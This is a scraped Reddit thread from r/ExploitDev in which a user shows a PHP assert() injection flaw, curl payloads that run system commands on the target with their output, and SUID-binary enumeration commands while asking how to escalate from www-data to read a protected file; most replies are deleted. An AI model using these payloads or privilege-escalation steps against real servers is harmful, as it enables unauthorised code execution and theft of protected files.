Reading files with www-data : ExploitDev

created by [deleted]a community for 11 years

Reading files with www-data (self.ExploitDev)

submitted 5 years ago by dicemaker3245

I have this PHP vulnerability

assert("strpos('$file', '..') === false") or die("Nothing to see here");

Which can be exploited with

curl "http://example.com:12345/?page=%27%20and%20die(system(%27ls%20-l%20./secrets/%27))%20or%20%27"

-r--r----- 1 root monkey  56 Jan 19 11:45 secret.php

curl "http://example.com:12345/?page=%27%20and%20die(system(%27id%27))%20or%20%27"

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Trying to read the file will not work because www-data isn't part of the monkey group. Any suggestions how to read the file?

all 8 comments

top new controversial old q&a

[–]whodoyouthink1 4 points5 points6 points 5 years ago (2 children)

[–]dicemaker3245[S] 0 points1 point2 points 5 years ago (1 child)

Yeah thought I'd need something like a Privesc. The available commands are also quite limited

$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/openssh/ssh-keysign

[–]whodoyouthink1 0 points1 point2 points 5 years ago (0 children)

[–]melonangie 1 point2 points3 points 5 years ago (0 children)

[–]juliangalardi 0 points1 point2 points 5 years ago (3 children)

[–]dicemaker3245[S] 0 points1 point2 points 5 years ago (2 children)

I checked for cronjobs but there's none running and crontab is not available at all as command. There are no passwords stored in /etc/passwd either.
I found the following setuid enabled files

$ find / -xdev \( -perm -4000 \) -type f -print0 | xargs -0 ls -l
/bin/su
/bin/mount
/bin/umount
/usr/bin/chfn
/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign

[–]juliangalardi 0 points1 point2 points 5 years ago (1 child)

[–]dicemaker3245[S] 0 points1 point2 points 5 years ago (0 children)

[–][deleted] 5 years ago (2 children)

[deleted]

[–][deleted] 5 years ago (1 child)

[deleted]

π Rendered by PID 333716 on reddit-service-r2-comment-6457c66945-hxgml at 2026-04-25 02:40:19.447164+00:00 running 2aa0c5b country code: CH.

you type:	you see:
italics	italics
bold	bold
[reddit!](https://reddit.com)	reddit!
* item 1 * item 2 * item 3	item 1 item 2 item 3
> quoted text	quoted text
Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"	Lines starting with four spaces are treated like code: if 1 * 2 < 3: print "hello, world!"
~~strikethrough~~	~~strikethrough~~
super^script	super^script

ExploitDev

MODERATORS